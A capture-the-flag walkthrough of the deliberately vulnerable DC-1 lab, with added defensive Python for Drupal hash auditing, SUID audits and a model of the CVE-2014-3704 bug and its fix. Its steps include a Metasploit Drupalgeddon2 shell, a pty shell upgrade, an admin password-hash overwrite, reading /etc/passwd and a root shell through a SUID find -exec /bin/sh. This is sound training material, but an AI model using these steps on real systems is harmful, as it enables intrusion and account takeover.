DC1
Download:
https://download.vulnhub.com/dc/DC-1.zip
Challenge description:
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.
There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.
There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.
Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.
Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.
Information gathering
1.1 arp-scan -l
1.2 ifconfig
1.3 nmap -p- -sV 192.168.126.130
Found rpcbind.
The rpcbind service on port 111 can be abused for UDP reflection DDoS attacks.
1.4 whatweb
Exploitation
2.1 Found Drupal 7
2.2 Start msf
2.3 search drupal
2.4 Try unix/webapp/drupal_drupalgeddon2 (remote command execution)
use 1
show options
set rhost 192.168.126.130
run
Got a shell
sysinfo
(run help to list the available commands)
ls
2.5 Found flag1.txt
cat flag1.txt
Database
3.1 Hint: there is something in the Drupal site configuration file
3.2 Found the database credentials
3.3 Drop into the host's command shell:
shell
To get a fully interactive terminal:
python -c 'import pty;pty.spawn("/bin/bash")'
or
script /dev/null
3.4 mysql -udbuser -p
(password: R0ck3t)
show databases;
use drupaldb;
show tables;
select * from users;
(exit to quit)
3.5 The site configuration file viewed earlier showed that passwords are stored as salted MD5 hashes,
so the hash cannot be brute-forced; take a different route.
3.6 Password reset
find / -name "password-hash.sh"
php /var/www/scripts/password-hash.sh 123
Copy the resulting salted MD5 hash:
$S$DRg21kugCL0AGQqr1G90hPfO.XkoCuhFqYU.HZfT8me7BiSMlYPT
Go back into mysql:
update users set pass="$S$DMHrgiAJFOw9uyksr.7CaAWWS1eMIGnGmCCjFFZrNdaDIg4dcw8B" where uid=1;
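Step 3.5 says the stored hashes cannot be brute-forced and step 3.6 works around that by minting a fresh hash with password-hash.sh. The Python below is an added example, not part of the original write-up and not Drupal's code, that reimplements the `$S$` format seen on this box so the reason is visible: the `$S$` prefix marks Drupal 7's iterated, salted SHA-512 scheme (the legacy `$P$`/`$H$` prefixes are the MD5-based phpass variants), the fourth character encodes the iteration exponent, and every verification, by the site or by someone guessing offline, has to repeat that many SHA-512 rounds. `audit_cost` and `new_salt` are helper names of my own; the hash quoted in step 3.6 is only parsed for its parameters.

```python
import hashlib
import hmac
import os

# Drupal 7 / phpass alphabet for the custom base64 used in stored hashes.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55              # stored hashes are truncated to 55 characters
MIN_LOG2, MAX_LOG2 = 7, 30    # accepted range for the iteration exponent
DEFAULT_LOG2 = 15             # Drupal 7 default: 2**15 = 32768 SHA-512 rounds

def _phpass_b64(raw: bytes) -> str:
    """phpass-style base64: 3 bytes -> 4 chars, little-endian, ITOA64 alphabet, no padding."""
    out, i, n = [], 0, len(raw)
    while i < n:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def parse_setting(stored: str):
    """Split a stored $S$ hash into (count_log2, salt); raise ValueError if malformed."""
    if len(stored) != HASH_LENGTH or not stored.startswith("$S$"):
        raise ValueError("not a Drupal 7 $S$ hash")
    count_log2 = ITOA64.find(stored[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError("iteration exponent out of range")
    return count_log2, stored[4:12]

def drupal7_hash(password: str, salt: str, count_log2: int = DEFAULT_LOG2) -> str:
    """Stored form of `password` for an 8-character salt and 2**count_log2 iterations."""
    if len(salt) != 8:
        raise ValueError("salt must be 8 characters")
    pw = password.encode("utf-8")
    digest = hashlib.sha512(salt.encode("ascii") + pw).digest()
    for _ in range(1 << count_log2):          # the work factor an offline guess must repeat
        digest = hashlib.sha512(digest + pw).digest()
    setting = "$S$" + ITOA64[count_log2] + salt
    return (setting + _phpass_b64(digest))[:HASH_LENGTH]

def new_salt() -> str:
    """Random 8-character salt drawn from the ITOA64 alphabet (hypothetical helper)."""
    return "".join(ITOA64[b & 0x3F] for b in os.urandom(8))

def verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and exponent, then compare in constant time."""
    count_log2, salt = parse_setting(stored)
    return hmac.compare_digest(drupal7_hash(password, salt, count_log2), stored)

def audit_cost(stored: str) -> int:
    """SHA-512 rounds that one guess against this hash costs (hypothetical helper name)."""
    count_log2, _ = parse_setting(stored)
    return 1 << count_log2

if __name__ == "__main__":
    # Hash quoted in step 3.6 of the write-up; only its parameters are inspected here.
    from_writeup = "$S$DRg21kugCL0AGQqr1G90hPfO.XkoCuhFqYU.HZfT8me7BiSMlYPT"
    print("exponent/salt:", parse_setting(from_writeup), "rounds per guess:", audit_cost(from_writeup))
    h = drupal7_hash("example-passphrase", new_salt())
    print(h, verify("example-passphrase", h), verify("wrong", h))
```

Run against the hash from step 3.6 it reports exponent 15 (32768 rounds) and salt `Rg21kugC`. A defender auditing the `users` table can run `audit_cost` over every `pass` value and flag anything below the Drupal default of 15, and anything that is not an `$S$` hash at all (legacy `$P$`/`$H$` imports), as candidates for rehashing.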
4.1 Log in to the admin back end
http://192.168.126.130
Content, top left
4.2 Found flag3
Following its hint:
cat /etc/passwd
cat /home/flag4.txt
4.3 Found flag4
Privilege escalation
5.1 Escalate privileges following the hint in flag4
Linux privilege escalation via SUID
5.2 Look for commands with the SUID bit set
find / -perm -u=s -type f 2>/dev/null
find itself has SUID set
5.3 Escalate with find
find /usr/bin/find -exec "/bin/sh" \;
cd /root
cat thefinalflag.txt
5.4 Found the final flag
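The `find / -perm -u=s` search in step 5.2 is also the defender's audit: the escalation in 5.3 only works because `find` carries a setuid bit it has no need for. The Python below is an added example, not from the original write-up, that enumerates setuid regular files under the given roots using lstat (so symlinks are reported rather than followed), compares them with an allowlist, and returns the ones that need a justification. `BASELINE_SUID` is a constructed, illustrative list and not a vetted Debian baseline; `build_sample_tree` creates a constructed fixture so the code can be tried without a real setuid binary.

```python
import os
import stat
from typing import Iterable, List, Set

# Constructed, illustrative allowlist of setuid binaries a stock Debian-family host is
# expected to carry. It is NOT a vetted baseline: derive the real one from a known-good
# image of the same release and keep it under change control.
BASELINE_SUID: Set[str] = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}

def find_setuid(roots: Iterable[str]) -> List[str]:
    """Return regular files under the given roots that have the setuid bit set.

    Same intent as `find / -perm -u=s -type f`; lstat() is used so symlinks are
    reported as themselves rather than followed, and unreadable entries are skipped.
    """
    found: List[str] = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # vanished or unreadable; a full audit should log this
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.append(path)
    return sorted(found)

def unexpected_setuid(roots: Iterable[str], baseline: Set[str] = BASELINE_SUID) -> List[str]:
    """Setuid files not on the baseline. Each one needs a justification or `chmod u-s`."""
    return [p for p in find_setuid(roots) if p not in baseline]

def build_sample_tree(base: str) -> List[str]:
    """Constructed fixture: one setuid file and one plain file under `base`.
    Returns [setuid_path, plain_path]. Setting the bit on your own file needs no root."""
    os.makedirs(base, exist_ok=True)
    suid_path = os.path.join(base, "fake-find")
    plain_path = os.path.join(base, "plain-tool")
    for p in (suid_path, plain_path):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(suid_path, 0o4755)
    os.chmod(plain_path, 0o755)
    return [suid_path, plain_path]

if __name__ == "__main__":
    # On a real host run this as root over /bin, /usr and /sbin; here a constructed tree is used.
    import tempfile
    sample = tempfile.mkdtemp(prefix="suid-audit-")
    suid, _ = build_sample_tree(sample)
    print("unexpected setuid files:", unexpected_setuid([sample]))
    print("after allowlisting:", unexpected_setuid([sample], BASELINE_SUID | {suid}))
```

Run as root over the system paths on this box it would report /usr/bin/find. The fix for such a finding is `chmod u-s` on the binary, and an integrity baseline (AIDE, `rpm -V`, `dpkg --verify`) so that a new setuid file raises an alert instead of being discovered during an incident.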
Addendum: missed steps
3.7 CVE-2014-3704 - Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)
3.8 searchsploit Drupal
Drupal 7 has a vulnerability that allows an admin user to be added
3.9 Locate the exploit
locate php/webapps/34992.py
3.10 Copy it to the working directory
cp /usr/share/exploitdb/exploits/php/webapps/34992.py ./
3.11 Check the usage
cat 34992.py
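Steps 3.7 to 3.11 point at the exploit-db script for CVE-2014-3704. The bug itself sat in the database abstraction layer's expansion of array arguments into placeholders: the new placeholder names were built from the array keys, and those keys came straight from the request, so text that should only ever have been a bound value was written into the SQL string. The Python below is an added, deliberately simplified model of that bug class and its fix, written for this walkthrough; it is not Drupal's code and the function names are my own. The fixed version numbers placeholders with a counter and, as defence in depth, rejects a base placeholder name that is not an identifier, so a key can no longer reach the query text. `looks_tampered` is a detection heuristic of my own based on the same observation.

```python
import re
from typing import Dict, List, Tuple

# Placeholder names that the developer writes into the query text must be identifiers.
PLACEHOLDER_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")

def _splice(query: str, name: str, placeholders: List[str]) -> str:
    """Replace the whole token ':name' with a comma-separated list of placeholders."""
    return re.sub(rf":{re.escape(name)}\b", lambda _m: ", ".join(placeholders), query)

def expand_arguments_vulnerable(query: str, args: Dict) -> Tuple[str, Dict]:
    """Model of the pre-fix behaviour (hypothetical reimplementation, not Drupal's code).

    An array argument is expanded into one placeholder per element, and the new
    placeholder name is built from the element's KEY. When the array comes straight
    from a request (name[...]), the key is caller-controlled text that is written
    into the SQL string itself, outside any parameter binding.
    """
    new_args: Dict = {}
    for name, value in args.items():
        if isinstance(value, dict):
            placeholders = []
            for key, item in value.items():
                ph = f"{name}_{key}"            # the key lands in the query text
                placeholders.append(f":{ph}")
                new_args[ph] = item
            query = _splice(query, name, placeholders)
        else:
            new_args[name] = value
    return query, new_args

def expand_arguments_fixed(query: str, args: Dict) -> Tuple[str, Dict]:
    """Hardened form: placeholder names come from a counter, never from the key.

    Only VALUES are taken from the caller, and they stay bound parameters. Validating
    the base placeholder name guards against a developer typo; the counter is the fix.
    """
    new_args: Dict = {}
    for name, value in args.items():
        if not PLACEHOLDER_RE.match(name):
            raise ValueError(f"invalid placeholder name: {name!r}")
        if isinstance(value, dict):
            placeholders = []
            for i, item in enumerate(value.values()):
                ph = f"{name}_{i}"              # counter, not caller data
                placeholders.append(f":{ph}")
                new_args[ph] = item
            query = _splice(query, name, placeholders)
        else:
            new_args[name] = value
    return query, new_args

def looks_tampered(form_array: Dict) -> bool:
    """Detection heuristic: a form array that should be a plain list has a non-integer key."""
    return not all(str(k).isdigit() for k in form_array)

if __name__ == "__main__":
    query = "SELECT uid FROM users WHERE name IN (:name)"
    # Constructed request data: the first element's key is not an integer.
    submitted = {"name": {"0 -- injected": "alice", "1": "bob"}}
    print(expand_arguments_vulnerable(query, submitted)[0])
    print(expand_arguments_fixed(query, submitted)[0])
    print("tampered:", looks_tampered(submitted["name"]))
```

With the constructed key `0 -- injected`, the vulnerable expansion emits that text verbatim into the IN clause, while the fixed expansion yields `IN (:name_0, :name_1)` with both values still bound. For a live Drupal 7 site the remediation is upgrading past 7.31 (7.32 carried the fix); for detection, the keys of the login form's `name[...]` array are only ever integers in legitimate traffic, so anything else in captured request bodies is a reliable signature.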